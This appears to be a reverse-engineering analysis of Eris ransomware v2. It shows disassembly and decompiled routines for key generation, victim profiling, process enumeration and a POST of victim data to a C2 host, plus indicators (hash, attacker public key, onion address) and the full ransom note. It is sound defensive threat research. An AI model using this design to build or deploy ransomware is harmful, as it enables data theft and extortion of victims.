Go under the hood: Eris Ransomware

Eris ransomware was first discovered in May 2019. In July it was reported by Bleeping Computer that the malware was being distributed by the RIG exploit kit.

Here is a set of analysis notes for version two of the family. The sample used for the analysis has the hash of 99d19dd82330a1c437a64e7ca9896ad9d914de10c4f7aa2222b1a5bc4750f692

Malware overview

Version two of the Eris ransomware are made up of six packages.

  • Sync package used to collect victim information and send it to the operator.
  • Main package
  • Utils
  • Cryptography
  • Anti package used for wiping 3rd party backup files
  • Walk package used to walk the file system

A source code layout created by redress is shown below.

Package Eris/Sync: .
File: .	
	init Lines: 1 to 11 (10)	
	GetOS Lines: 5 to 17 (12)	
	GetSpace Lines: 11 to 12 (1)	
	GetID Lines: 11 to 25 (14)	
	GetGeo Lines: 12 to 22 (10)	
	GetSyncInfo Lines: 17 to 85 (68)	
	machineID Lines: 25 to 27 (2)	
	GetSyns Lines: 85 to 451 (366)	
Package main: .
File: .	
	init Lines: 1 to 1 (0)	
	Init Lines: 30 to 46 (16)	
	main Lines: 46 to 236 (190)	
	mainfunc1 Lines: 165 to 166 (1)	
	ReadFileA Lines: 236 to 246 (10)	
	LineCountA Lines: 246 to 250 (4)	
Package Eris/Utils: .
File: .	
	init Lines: 1 to 1 (0)	
	RandStringBytes Lines: 18 to 35 (17)	
	Kill Lines: 35 to 64 (29)	
	initializers Lines: 43 to 44 (1)	
	Execute Lines: 64 to 83 (19)	
	(*WindowsProcess)Pid Lines: 78 to 82 (4)	
	(*WindowsProcess)PPid Lines: 82 to 86 (4)	
	GetDrive Lines: 83 to 107 (24)	
	(*WindowsProcess)Executable Lines: 86 to 90 (4)	
	newWindowsProcess Lines: 90 to 122 (32)	
	Contains Lines: 107 to 119 (12)	
	Exists Lines: 119 to 130 (11)	
	processes Lines: 122 to 127 (5)	
	Wrap Lines: 130 to 139 (9)	
Package Eris/Cryptography: .
File: .	
	init Lines: 1 to 1 (0)	
	RC4Encrypt Lines: 5 to 15 (10)	
	RSAGenerateKey Lines: 15 to 43 (28)	
	Lock Lines: 23 to 57 (34)	
	RSAEncrypt Lines: 43 to 46 (3)	
Package Eris/Anti: .
File: .	
	init Lines: 1 to 10 (9)	
	WipeBackup Lines: 11 to 15 (4)	
Package Eris/Walk: .
File: .	
	init Lines: 1 to 116 (115)	
	Check Lines: 10 to 18 (8)	
	WalkDirectores Lines: 18 to 130 (112)	
	WalkComputer Lines: 130 to 133 (3)	
	WalkComputerfunc1 Lines: 133 to 142 (9)	
	WalkComputerfunc2 Lines: 142 to 143 (1)	

Technical breakdown

Loading import functions

The malware loads some additional imports in its init function. These imports are later used to list all the running processes.

(fcn) sym.Eris_Utils_init.ializers
0x0053df90  mov ecx, dword fs:[0x14]
0x0053df97  mov ecx, dword [ecx]
0x0053df9d  cmp esp, dword [ecx + 8]
0x0053dfa0  jbe 0x53e101
0x0053dfa6  sub esp, 0x10
0x0053dfa9  lea eax, str_kernel32.dll ; "kernel32.dll"
0x0053dfaf  mov dword [esp], eax
0x0053dfb2  mov dword [var_4h], 0xc
0x0053dfba  call sym.syscall.NewLazyDLL
0x0053dfbf  mov eax, dword [0x88be50]
0x0053dfc5  mov ecx, dword [var_8h]
0x0053dfc9  test eax, eax
0x0053dfcb  jne 0x53e0ef
0x0053dfd1  mov dword [sym.hKernel32.dll], ecx
0x0053dfd7  mov dword [esp], ecx
0x0053dfda  lea eax, [0x675b84] ; "CloseHandle"
0x0053dfe0  mov dword [var_4h], eax
0x0053dfe4  mov dword [var_8h], 0xb
0x0053dfec  call sym.syscall___LazyDLL_.NewProc
0x0053dff1  mov eax, dword [0x88be50]
0x0053dff7  mov ecx, dword [var_ch]
0x0053dffb  test eax, eax
0x0053dffd  jne 0x53e0dd
0x0053e003  mov dword [sym.pCloseHandle], ecx
0x0053e009  mov eax, dword [sym.hKernel32.dll]
0x0053e00f  mov dword [esp], eax
0x0053e012  lea eax, [0x67ae16] ; "CreateToolhelp32Snapshot"
0x0053e018  mov dword [var_4h], eax
0x0053e01c  mov dword [var_8h], 0x18
0x0053e024  call sym.syscall___LazyDLL_.NewProc
0x0053e029  mov eax, dword [0x88be50]
0x0053e02f  mov ecx, dword [var_ch]
0x0053e033  test eax, eax
0x0053e035  jne 0x53e0cb
0x0053e03b  mov dword [sym.pCreateToolhelp32Snapshot], ecx
0x0053e041  mov eax, dword [sym.hKernel32.dll]
0x0053e047  mov dword [esp], eax
0x0053e04a  lea eax, [0x6772a1] ; "Process32FirstW"
0x0053e050  mov dword [var_4h], eax
0x0053e054  mov dword [var_8h], 0xf
0x0053e05c  call sym.syscall___LazyDLL_.NewProc
0x0053e061  mov eax, dword [0x88be50]
0x0053e067  mov ecx, dword [var_ch]
0x0053e06b  test eax, eax
0x0053e06d  jne 0x53e0bc
0x0053e06f  mov dword [sym.pProcess32FirstW], ecx
0x0053e075  mov eax, dword [sym.hKernel32.dll]
0x0053e07b  mov dword [esp], eax
0x0053e07e  lea eax, [0x676d3a] ; "Process32NextW"
0x0053e084  mov dword [var_4h], eax
0x0053e088  mov dword [var_8h], 0xe
0x0053e090  call sym.syscall___LazyDLL_.NewProc
0x0053e095  mov eax, dword [0x88be50]
0x0053e09b  mov ecx, dword [var_ch]
0x0053e09f  test eax, eax
0x0053e0a1  jne 0x53e0ad
0x0053e0a3  mov dword [sym.pProcess32NextW], ecx
0x0053e0a9  add esp, 0x10
0x0053e0ac  ret

Encryption key generation

The malware uses the following struct to store the keys generated for the victim.

type main.Session struct {
    Extension string
    PUBLIC_KEY []uint8
    E_PRIVATE_KEY []uint8
}

It is also stored encrypted on the disk. The following snippet shows the generation of file path to the files.

0x005fe3ff  lea eax, [0x6770d0] ; "ALLUSERSPROFILE"
0x005fe405  mov dword [esp], eax
0x005fe408  mov dword [var_4h], 0xf
0x005fe410  call fcn.os.Getenv
0x005fe415  mov eax, dword [var_ch]
0x005fe419  mov ecx, dword [var_8h]
0x005fe41d  mov dword [esp], ecx
0x005fe420  mov dword [var_4h], eax
0x005fe424  call fcn.runtime.convTstring
0x005fe429  mov eax, dword [var_8h]
0x005fe42d  mov dword [var_198h], 0
0x005fe438  mov dword [var_19ch], 0
0x005fe443  mov dword [var_1a0h], 0
0x005fe44e  mov dword [var_1a4h], 0
0x005fe459  lea ecx, sym.type.string
0x005fe45f  mov dword [var_198h], ecx
0x005fe466  mov dword [var_19ch], eax
0x005fe46d  mov dword [var_1a0h], ecx
0x005fe474  lea eax, [0x6cec98] ; "00000000.pky"
0x005fe47a  mov dword [var_1a4h], eax
0x005fe481  lea eax, [0x6745d6] ; "%s\%s"
0x005fe487  mov dword [esp], eax
0x005fe48a  mov dword [var_4h], 5
0x005fe492  lea edx, [var_198h]
0x005fe499  mov dword [var_8h], edx
0x005fe49d  mov dword [var_ch], 2
0x005fe4a5  mov dword [var_10h], 2
0x005fe4ad  call fcn.fmt.Sprintf

The data is stored in these three files:

  • %ALLUSERSPROFILE%\00000000.pky
  • %ALLUSERSPROFILE%\00000000.eky
  • %ALLUSERSPROFILE%\00000000.ext

If files already exists, they are used instead of generating a new key.

0x005fe65a  mov edx, dword [pky_path_str]
0x005fe661  mov dword [esp], edx
0x005fe664  mov ebx, dword [pky_path_str_len]
0x005fe66b  mov dword [var_4h], ebx
0x005fe66f  call fcn.Eris_Utils.Exists
0x005fe674  movzx eax, byte [var_8h]
0x005fe679  test al, al
0x005fe67b  je 0x5ff0c4
0x005fe681  mov eax, dword [pky_path_str]
0x005fe688  mov dword [esp], eax
0x005fe68b  mov eax, dword [pky_path_str_len]
0x005fe692  mov dword [var_4h], eax
0x005fe696  call fcn.main.ReadFileA
0x005fe69b  mov eax, dword [var_14h]
0x005fe69f  mov ecx, dword [var_10h]
0x005fe6a3  mov edx, dword [var_8h]
0x005fe6a7  mov ebx, dword [var_ch]
0x005fe6ab  test eax, eax

The victim’s private key is encrypted with the threat actor’s public key. The encrypted blob is further encrypted RC4.

0x005ff212  lea esi, [0x68736a] ; Public key
0x005ff218  call fcn.0044d9f0
0x005ff21d  mov ecx, dword [var_174h]
0x005ff224  mov dword [esp], ecx
0x005ff227  mov dword [var_4h], 0x80
0x005ff22f  mov dword [var_8h], 0x80
0x005ff237  mov dword [var_ch], eax
0x005ff23b  mov dword [var_10h], 0x1c3
0x005ff243  mov dword [var_14h], 0x1c3
0x005ff24b  call fcn.Eris_Cryptography.RSAEncrypt
0x005ff250  mov eax, dword [var_20h]
0x005ff254  mov dword [var_8ch], eax
0x005ff25b  mov ecx, dword [var_1ch]
0x005ff25f  mov dword [var_84h], ecx
0x005ff266  mov edx, dword [var_18h]
0x005ff26a  mov dword [var_140h], edx
0x005ff271  mov ebx, dword [var_148h]
0x005ff278  mov dword [esp], ebx
0x005ff27b  mov ebx, dword [var_98h]
0x005ff282  mov dword [var_4h], ebx
0x005ff286  mov ebx, dword [var_9ch]
0x005ff28d  mov dword [var_8h], ebx
0x005ff291  mov ebx, dword [var_174h]
0x005ff298  mov dword [var_ch], ebx
0x005ff29c  mov dword [var_10h], 0x80
0x005ff2a4  mov dword [var_14h], 0x80
0x005ff2ac  call fcn.Eris_Cryptography.RC4Encrypt
0x005ff2b1  mov eax, dword [var_1ch]
0x005ff2b5  mov dword [var_88h], eax
0x005ff2bc  mov ecx, dword [var_18h]
0x005ff2c0  mov dword [var_13ch], ecx
0x005ff2c7  mov edx, dword [var_20h]
0x005ff2cb  mov dword [var_90h], edx

Threat actor’s key:

--BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAiVFawLHK0Gld4XUYi7Wq
1ura1N78VvOuW4kvH/yDYOajqRx7nqFB2mokTDqHa5phT48FtLMbuFc+j39YnZBa
jjSN2zDaC13vDRNXfiW41yJAtMAJXh17cE/lAdAgEUQdYwJPVHfDuCPGGO5Dn+hg
xehdJvIiNFbKCCFP7EojDH0kK1h9p8TngwqHySBNLUADKeONKPk171oe+5isEnbF
VjBcinGF13V/CRBKXsrH2z7BCWtyZTG+MWXRqUOn2mYOFgt4ZNOe4U0nz6/A1YmJ
V8NybH2vHp4Bs/ov7RcnQUvW0BwG0/xp6YDSaOt59A0rEbJE0+J3NTlEVPesehOr
xwIDAQAB
-----END PUBLIC KEY-----

The malware also looks for the existence of the file: C:\eris.was

0x005fe7f2  lea eax, [0x675b79] ; "C:\eris.was"
0x005fe7f8  mov dword [esp], eax
0x005fe7fb  mov dword [var_4h], 0xb
0x005fe803  call fcn.Eris_Utils.Exists
0x005fe808  movzx eax, byte [var_8h]
0x005fe80d  test al, al
0x005fe80f  jne 0x5ff05d
0x005fe815  xor eax, eax
0x005fe817  mov dword [var_94h], eax
0x005fe81e  mov ecx, dword [session]
0x005fe825  mov edx, dword [ecx + 0x14]
0x005fe828  mov ebx, dword [ecx + 0x18]
0x005fe82b  mov ebp, dword [ecx + 0x1c]
0x005fe82e  mov dword [esp], edx
0x005fe831  mov dword [var_4h], ebx
0x005fe835  mov dword [var_8h], ebp
0x005fe839  call fcn.Eris_Sync.GetSyns

Victim information

The Eris malware collects information about the infected system. The data is populated into the structure shown below.

type Struct.BotJson struct{
    UID string
    SID string
    Kind int
    Storage []struct {
        Alphabet string `json:"alphabet"`
        Label string `json:"label"`
        Type int `json:"type"`
        Free int64 `json:"free"`
        Full int64 `json:"full"`
    }
    Extension string
    OS string
    UserName string
    PCName string
    Country string
    City string
    IP string
    Org string
    Stage1 string
    Stage2 string
    Date int64
}

Username is collected from the environment variable and the host name is retrieved via the standard library function:

0x005f8d21  lea ecx, [0x67505a] ; "USERNAME"
0x005f8d27  mov dword [esp], ecx
0x005f8d2a  mov dword [var_4h], 8
0x005f8d32  call fcn.os.Getenv
0x005f8d37  mov ecx, dword [var_8h]
0x005f8d3b  mov edx, dword [var_ch]
0x005f8d3f  mov dword [username_str], ecx
0x005f8d46  mov dword [username_str_len], edx
0x005f8d4d  nop
0x005f8d4e  call fcn.os.hostname
0x005f8d53  mov ecx, dword [esp]
0x005f8d56  mov edx, dword [var_4h]
0x005f8d5a  mov ebx, dword [var_8h]
0x005f8d5e  test ebx, ebx
0x005f8d60  je 0x5f8f7e
0x005f8d66  lea eax, [0x674dca] ; "unknown"
0x005f8d6c  mov dword [hostname_str], eax
0x005f8d73  mov dword [hostname_str_len], 7
...
0x005f8f7e  mov dword [hostname_str], ecx
0x005f8f85  mov dword [hostname_str_len], edx
0x005f8f8c  jmp 0x5f8d7e

The ID of the machine is generated from the machine ID. First the GUID is fetched from the registry. A summary of the Eris_Sync.machineID function is shown below.

0x005f8a10 "SOFTWARE\Microsoft\Cryptography"
0x005f8a2a call sym.golang.org_x_sys_windows_registry.OpenKey
0x005f8a5c call sym.runtime.deferproc
0x005f8a63 cjmp 0x005f8b0d
0x005f8a6f cjmp 0x005f8ae7
0x005f8a78 "MachineGuid"
0x005f8a8a call sym.golang.org_x_sys_windows_registry_Key.GetStringValue
0x005f8aa1 cjmp 0x005f8ac5
0x005f8abc call sym.runtime.deferreturn
0x005f8ac5:
0x005f8ade call sym.runtime.deferreturn
0x005f8ae7:
0x005f8b04 call sym.runtime.deferreturn
0x005f8b0d:
0x005f8b0e call sym.runtime.deferreturn
0x005f8b17:
0x005f8b17 call sym.runtime.morestack_noctxt
0x005f8b1c jmp 0x005f89d0
0x005f8b1c sym.Eris_Sync.machineID

The GUID is hashed with SHA1 and the hex-encoded string is used as the ID. If no GUID is found, the ID is generated from a set of random bytes. Below is a Ghidra decompiled representation of the function.

void sym.Eris_Sync.GetID(undefined4 uParm1, undefined4 uParm2)
{
    uint32_t *puVar1;
    int32_t iVar2;
    int32_t iVar3;
    int32_t in_FS_OFFSET;
    undefined4 *in_stack_ffffffa4;
    undefined4 *in_stack_ffffffa8;
    undefined4 *puVar4;
    undefined4 *in_stack_ffffffac;
    undefined4 *in_stack_ffffffb0;
    int32_t in_stack_ffffffb4;
    uint32_t in_stack_ffffffb8;
    uint32_t uVar5;
    int32_t in_stack_ffffffbc;
    undefined4 uStack56;
    int32_t iStack52;
    undefined4 uStack48;

    sym.Eris_Sync.machineID();
    puVar4 = in_stack_ffffffa8;
    if ((in_stack_ffffffac != (undefined4 *)0x0) && (in_stack_ffffffa8 == (undefined4 *)0x0)) {
    // If no GUID, generate random string.
        in_stack_ffffffa4 = in_stack_ffffffa8;
        in_stack_ffffffa8 = in_stack_ffffffac;
        sym.Eris_Utils.RandStringBytes(0x20);
        puVar4 = in_stack_ffffffa4;
    }
    sym.runtime.newobject(sym.type.sha1.digest);
    *puVar4 = 0x67452301;
    puVar4[1] = 0xefcdab89;
    puVar4[2] = 0x98badcfe;
    puVar4[3] = 0x10325476;
    puVar4[4] = 0xc3d2e1f0;
    puVar4[0x15] = 0;
    puVar4[0x16] = 0;
    puVar4[0x17] = 0;
    sym.runtime.stringtoslicebyte(0, in_stack_ffffffa4, in_stack_ffffffa8);
    sym.crypto_sha1___digest_.Write(puVar4, in_stack_ffffffb0, in_stack_ffffffb4, in_stack_ffffffb8);
    sym.runtime.newobject(sym.type._9_uint8);
    *in_stack_ffffffb0 = 0x6e617247;
    *(undefined4 *)((int32_t)in_stack_ffffffb0 + 1) = 0x646e6172;
    *(undefined4 *)((int32_t)in_stack_ffffffb0 + 5) = 0x73697245;
    sym.crypto_sha1___digest_.Write(puVar4, in_stack_ffffffb0, 9, 9);
    sym.crypto_sha1___digest_.Sum(puVar4, 0, 0, 0);
    iVar2 = in_stack_ffffffb4;
    uVar5 = in_stack_ffffffb8;
    iVar3 = in_stack_ffffffbc;
    sym.crypto_sha1___digest_.Sum(puVar4, 0, 0, 0);
    if (7 < uVar5) {
        iVar2 = iVar2 + (-(iVar3 + -8) >> 0x1f & 8U);
        sym.golang.org_x_crypto_pbkdf2.Key(in_stack_ffffffb4, in_stack_ffffffb8,
                        in_stack_ffffffbc, iVar2, uVar5 - 8,
                        iVar3 + -8, 0x7e4, 8, 0x68ae74);
        iVar3 = iStack52 << 1;
        sym.runtime.makeslice(sym.type.uint8, iVar3, iVar3);
        sym.encoding_hex.Encode(iVar2, iVar3, iVar3, uStack56,
                                iStack52, uStack48);
        sym.runtime.slicebytetostring(0, iVar2, iVar3, iVar3);
        return;
    }
    sym.runtime.panicslice();
    do {
        invalidInstructionException();
    } while( true );
}

Disk space is gathered from all disks attached. First the malware checks which drive letters exist.

0x005f7f92  cmp ecx, 0x1a ; 26
0x005f7f95  jge 0x5f80c7
0x005f7f9b  mov dword [var_3ch], ecx
0x005f7f9f  mov dword [var_4ch], ebx
0x005f7fa3  lea eax, [var_64h]
0x005f7fa7  mov dword [esp], eax
0x005f7faa  lea eax, [ecx + 0x41]
0x005f7fad  mov dword [var_4h], eax
0x005f7fb1  sar eax, 0x1f
0x005f7fb4  mov dword [var_8h], eax
0x005f7fb8  call fcn.runtime.intstring
0x005f7fbd  mov eax, dword [var_10h]
0x005f7fc1  mov ecx, dword [var_ch]
0x005f7fc5  mov dword [esp], 0
0x005f7fcc  mov dword [var_4h], ecx
0x005f7fd0  mov dword [var_8h], eax
0x005f7fd4  lea eax, [0x673e20] ; ":\"
0x005f7fda  mov dword [var_ch], eax
0x005f7fde  mov dword [var_10h], 2
0x005f7fe6  call fcn.runtime.concatstring2
0x005f7feb  mov eax, dword [var_18h]
0x005f7fef  mov dword [var_50h], eax
0x005f7ff3  mov ecx, dword [var_14h]
0x005f7ff7  mov dword [var_474h], ecx
0x005f7ffe  mov dword [esp], ecx
0x005f8001  mov dword [var_4h], eax
0x005f8005  call fcn.os.Stat
0x005f800a  mov eax, dword [var_10h]
0x005f800e  mov ecx, dword [var_14h]
0x005f8012  mov dword [esp], eax
0x005f8015  mov dword [var_4h], ecx
0x005f8019  call fcn.os.IsNotExist
0x005f801e  movzx eax, byte [var_8h]
0x005f8023  test al, al

The disk space is gotten by calling GetVolumeInformationW.

0x005f82e9  lea edx, [0x67983a] ; "GetVolumeInformationW"
0x005f82ef  mov dword [var_4h], edx
0x005f82f3  mov dword [var_8h], 0x15
0x005f82fb  call fcn.syscall.GetProcAddress
0x005f8300  mov edx, dword [var_ch]
0x005f8304  mov dword [pGetVolumeInformationW], edx
0x005f8308  mov ebx, dword [var_470h]
0x005f830f  mov dword [esp], ebx
0x005f8312  mov ebp, dword [var_38h]
0x005f8316  mov dword [var_4h], ebp
0x005f831a  call fcn.syscall.StringToUTF16Ptr
0x005f831f  mov edx, dword [var_8h]
0x005f8323  mov dword [var_498h], edx
0x005f832a  lea edx, [var_266h]
0x005f8331  mov dword [var_494h], edx
0x005f8338  lea ebx, [var_54h]
0x005f833c  mov dword [var_490h], ebx
0x005f8343  lea ebx, [var_58h]
0x005f8347  mov dword [var_48ch], ebx
0x005f834e  lea ebx, [var_5ch]
0x005f8352  mov dword [var_488h], ebx
0x005f8359  lea ebx, [var_68h]
0x005f835d  mov dword [var_484h], ebx
0x005f8364  mov ebx, dword [pGetVolumeInformationW]
0x005f8368  mov dword [esp], ebx
0x005f836b  mov dword [var_4h], 8
0x005f8373  mov ebx, dword [var_498h]
0x005f837a  mov dword [var_8h], ebx
0x005f837e  mov ebx, dword [var_494h]
0x005f8385  mov dword [var_ch], ebx
0x005f8389  mov dword [var_10h], 0x105
0x005f8391  mov ebx, dword [var_490h]
0x005f8398  mov dword [var_14h], ebx
0x005f839c  mov ebx, dword [var_48ch]
0x005f83a3  mov dword [var_18h], ebx
0x005f83a7  mov ebx, dword [var_488h]
0x005f83ae  mov dword [var_1ch], ebx
0x005f83b2  mov ebx, dword [var_484h]
0x005f83b9  mov dword [var_20h], ebx
0x005f83bd  mov dword [var_24h], 0x105
0x005f83c5  mov dword [var_28h], 0
0x005f83cd  call fcn.syscall.Syscall9
0x005f80fa  mov eax, dword [var_470h]
0x005f8101  mov dword [esp], eax
0x005f8104  mov ecx, dword [var_38h]
0x005f8108  mov dword [var_4h], ecx
0x005f810c  call fcn.syscall.StringToUTF16Ptr
0x005f8111  mov eax, dword [var_8h]
0x005f8115  mov dword [var_49ch], eax
0x005f811c  lea ecx, sym.type._4_uintptr
0x005f8122  mov dword [esp], ecx
0x005f8125  call fcn.runtime.newobject
0x005f812a  mov eax, dword [var_4h]
0x005f812e  mov ecx, dword [var_49ch]
0x005f8135  mov dword [eax], ecx
0x005f8137  mov ecx, dword [var_4ach]
0x005f813e  mov dword [eax + 4], ecx
0x005f8141  mov ecx, dword [var_4a8h]
0x005f8148  mov dword [eax + 8], ecx
0x005f814b  mov ecx, dword [var_4b0h]
0x005f8152  mov dword [eax + 0xc], ecx
0x005f8155  mov ecx, dword [pGetDiskFreeSpaceExW]
0x005f815c  mov dword [esp], ecx
0x005f815f  mov dword [var_4h], eax
0x005f8163  mov dword [var_8h], 4
0x005f816b  mov dword [var_ch], 4
0x005f8173  call fcn.syscall___Proc_.Call
0x005f8178  mov eax, dword [var_470h]
0x005f817f  mov dword [esp], eax
0x005f8182  mov eax, dword [var_38h]
0x005f8186  mov dword [var_4h], eax
0x005f818a  call fcn.syscall.StringToUTF16Ptr
0x005f818f  mov eax, dword [var_8h]
0x005f8193  mov dword [esp], eax
0x005f8196  call fcn.golang.org_x_sys_windows.GetDriveType

The information for each drive is stored in a slice of structs as shown below.

Returns:

    []struct {
        Alphabet string `json:"alphabet"`
        Label string `json:"label"`
        Type int `json:"type"`
        Free int64 `json:"free"`
        Full int64 `json:"full"`
    }

Operating information is collected from the registry key ProductName. Below is a Ghidra decompiled representation of the function.

void fcn.Eris_Sync.GetOS(undefined4 uParm1, undefined4 uParm2)
{
    while (puVar1 = (uint32_t *)(**(int32_t **)(in_FS_OFFSET + 0x14) + 8),
            register0x00000010 < (undefined *)*puVar1 || (undefined *)register0x00000010 == (undefined *)*puVar1) {
        fcn.runtime.morestack_noctxt();
    }
    uParm1 = 0;
    uParm2 = 0;
    uVar3 = 0xf003f;
    key = fcn.golang.org_x_sys_windows_registry.OpenKey(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", 0xf003f);
    fcn.runtime.deferproc(0xc, 0x68afc4, uStack24);
    if (key != 0) {
        if (iStack20 == 0) {
            prod_name = fcn.golang.org_x_sys_windows_registry_Key.GetStringValue(key, "ProductName");
            uParm1 = uVar3;
            if (prod_name != 0) {
                fcn.runtime.deferreturn();
                return prod_name;
            }
    }
    fcn.runtime.deferreturn();
    return "unknown";
}

Geo-location is gathered by performing a request to extreme-ip-lookup.com

0x005f84c4  lea ecx, sym.type.http.Client
0x005f84ca  mov dword [esp], ecx
0x005f84cd  call fcn.runtime.newobject
0x005f84d2  mov ecx, dword [var_4h]
0x005f84d6  mov dword [var_34h], ecx
0x005f84da  mov dword [ecx + 0x14], 0x540be400
0x005f84e1  mov dword [ecx + 0x18], 2
0x005f84e8  lea edx, sym.type.Struct.Geo
0x005f84ee  mov dword [esp], edx
0x005f84f1  call fcn.runtime.newobject
0x005f84f6  mov ecx, dword [var_4h]
0x005f84fa  mov dword [var_44h], ecx
0x005f84fe  lea edx, [0x673fa6] ; "GET"
0x005f8504  mov dword [esp], edx
0x005f8507  mov dword [var_4h], 3
0x005f850f  lea edx, [0x67f274] ; "http://extreme-ip-lookup.com/json/
0x005f8515  mov dword [var_8h], edx
0x005f8519  mov dword [var_ch], 0x22
0x005f8521  mov dword [var_10h], 0
0x005f8529  mov dword [var_14h], 0
0x005f8531  call fcn.net_http.NewRequest
0x005f8536  mov ecx, dword [var_18h]

User agent used: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36

Data returned from the service:

type Struct.Geo struct {
    BusinessName    string
    BusinessWebsite string
    City            string
    Continent       string
    Country         string
    CountryCode     string
    IPName          string
    IPType          string
    Isp             string
    Lat             string
    Lon             string
    Org             string
    Query           string
    Region          string
    Status          string
}

The data is sent to the C2 server located at d9d120a3.ngrok.io. The malware tries three times.

     0x005fe815  xor eax, eax
 .-> 0x005fe817  mov dword [var_94h], eax
 :   0x005fe81e  mov ecx, dword [session]
 :   0x005fe825  mov edx, dword [ecx + 0x14]
 :   0x005fe828  mov ebx, dword [ecx + 0x18]
 :   0x005fe82b  mov ebp, dword [ecx + 0x1c]
 :   0x005fe82e  mov dword [esp], edx
 :   0x005fe831  mov dword [var_4h], ebx
 :   0x005fe835  mov dword [var_8h], ebp
 :   0x005fe839  call fcn.Eris_Sync.GetSyns
 :   0x005fe83e  mov eax, dword [var_18h]
 :   0x005fe842  test eax, eax
,==< 0x005fe844  je 0x5fe853
|:   0x005fe846  mov eax, dword [var_94h]
|:   0x005fe84d  inc eax
|:   0x005fe84e  cmp eax, 3
|`=< 0x005fe851  jle 0x5fe817
`--> 0x005fe853  mov eax, dword [session]

Summary of function that sends the data:

0x005f8fa0:
0x005f8fb9 sym.type.http.Client
0x005f8fc2 call fcn.runtime.newobject
0x005f8ffd sym.type.string
0x005f9007 "d9d120a3.ngrok.io"
0x005f9015 "redirect"
0x005f901f "https://%s/%"
0x005f9048 call fcn.fmt.Sprintf
0x005f905e sym.type.bytes.Buffer
0x005f9067 call fcn.runtime.newobject
0x005f9086 cjmp 0x005f92c5
0x005f9092:
0x005f9092 "POST"
0x005f90c1 call fcn.net_http.NewRequest
0x005f90d6 sym.type.Struct.Response
0x005f90df call fcn.runtime.newobject
0x005f90ee cjmp 0x005f9118
0x005f90f0:
0x005f9118:
0x005f9129 "User-Agent"
0x005f913a call fcn.net_textproto.CanonicalMIMEHeaderKey
0x005f914f sym.type._1_string
0x005f9158 call fcn.runtime.newobject
0x005f9174 cjmp 0x005f92b5
0x005f917a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
0x005f9182:
0x005f9182 sym.type.textproto.MIMEHeader
0x005f91a3 call fcn.runtime.mapassign_faststr
0x005f91c2 cjmp 0x005f92a7
0x005f91ce:
0x005f91de call fcn.net_http___Client_.do
0x005f91ed cjmp 0x005f91f8
0x005f91ef:
0x005f91f3 jmp 0x005f90f0
0x005f91f8:
0x005f91fe sym.type.io.Reader
0x005f920f call fcn.runtime.convI2I
0x005f9234 call fcn.io_ioutil.readAll
0x005f924b cjmp 0x005f91ef
0x005f9258 sym.type._Struct.Response
0x005f926a call fcn.encoding_json.Unmarshal

The server response with the following data in JSON:

type Struct.Response struct {
    Response string
    Code     int
}

Ransomware initialization

Before encrypting files, the malware prepares the ransom note. The note is shown below. The malware performs the following operations on the note template:

  • Replace {version} with 2.0.3
  • Replace {host} with [[epaybfvlutydks6fpfwtwoe2fsph6vve2obgv6qbhyuqwkecbhsf7nyd.onion]]
  • Replace {id} with the id.
  • Replace {identification} with base58 encoded encrypted key.

    ***                                                 ***\x0d
    *** READ THIS FILE CAREFULLY TO RECOVERY YOUR FILES ***\x0d
    ***                                                 ***\x0d
    \x0d
    \x0d
    \x0d
    ALERT! \x0d
    ALL OF YOUR FILES HAVE BEEN ENCRYPTED BY "ERIS RANSOMWARE" v{version}!\x0d
    \x0d
    Welcome to Eris System Security Encryption Program!\x0d
    \x0d
    Keeping strong security for our clients in mind, we have implemented Strong Encryption Algorithm for securing the system.\x0d
    \x0d
    To personally update regarding the available decryption software and payment methods. Follow the steps below to access the payment page.\x0d
    \x0d
    \x0d
    Follow the steps below to access payment page.\x0d
    \x0d
    1. Download and install Tor browser from here:\x0d
    URL - https://www.torproject.org/download/\x0d
    \x0d
    2. Visit page below using Tor browser:\x0d
    URL - http://{host}/{id}\x0d
    \x0d
    3. Enter your "ERIS IDENTIFICATION". (You can find it in below)\x0d
    \x0d
    4. Follow the next steps(instructions) displayed on the page for successful decryption.\x0d
    \x0d
    Note: \x0d
    We only accept payments via Bitcoin (BTC)!\x0d
    \x0d
    \x0d
    ERIS IDENTIFICATION:\x0d
    \x0d
    {identification}\x0d
    \x0d
    \x0d
    * IF YOU NOT FOLLOW INSTRUCTIONS IN PAYMENT PAGE MORE THAN  7 DAYS!,\x0d
    YOUR CANNOT ACCESS TO PAYMENT PAGE OR YOUR FILES ANYMORE!\x0d
    \x0d
    * IN CASE OF FOLLOWING OUR INSTRUCTION,\x0d
    FAST AND EASILY EVERYTHING IS BACK TO NORMAL LIKE THAT NEVER HAPPENED!\x0d
    BUT IF YOU USE OTHER METHODS (THAT NEVER EVER HELPS) YOU JUST DESTROY EVERYTHING FOR GOODNESS!\x0d
    \x0d
    ---------------------------------\x0d
    * DO NOT MODIFY ENCRYPTED FILE(S)\x0d
    * DO NOT MOVE ENCRYPTED FILES\x0d
    * DO NOT USE RECOVERY SOFTWARE(S)\x0d
    ---------------------------------
    

Process enumeration

The malware enumerates all the running processes:

0x0053d024  mov ecx, dword [sym.pCreateToolhelp32Snapshot]
0x0053d02a  mov dword [esp], ecx
0x0053d02d  mov dword [var_4h], eax
0x0053d031  mov dword [var_8h], 2
0x0053d039  mov dword [var_ch], 2
0x0053d041  call fcn.syscall___LazyProc_.Call
0x0053d046  mov eax, dword [var_10h]
0x0053d04a  test eax, eax
0x0053d04c  jb 0x53d326
0x0053d052  mov dword [var_34h], eax
0x0053d056  lea eax, sym.type._1_uintptr
0x0053d05c  mov dword [esp], eax
0x0053d05f  call fcn.runtime.newobject
0x0053d064  mov eax, dword [var_4h]
0x0053d068  mov ecx, dword [var_34h]
0x0053d06c  mov dword [eax], ecx
0x0053d06e  mov dword [esp], 0x20
0x0053d075  lea edx, [0x68b3dc]
0x0053d07b  mov dword [var_4h], edx
0x0053d07f  mov edx, dword [sym.pCloseHandle]
0x0053d085  mov dword [var_8h], edx
0x0053d089  mov dword [var_ch], eax
0x0053d08d  mov dword [var_10h], 1
0x0053d095  mov dword [var_14h], 1
0x0053d09d  call fcn.runtime.deferproc
0x0053d0a2  test eax, eax
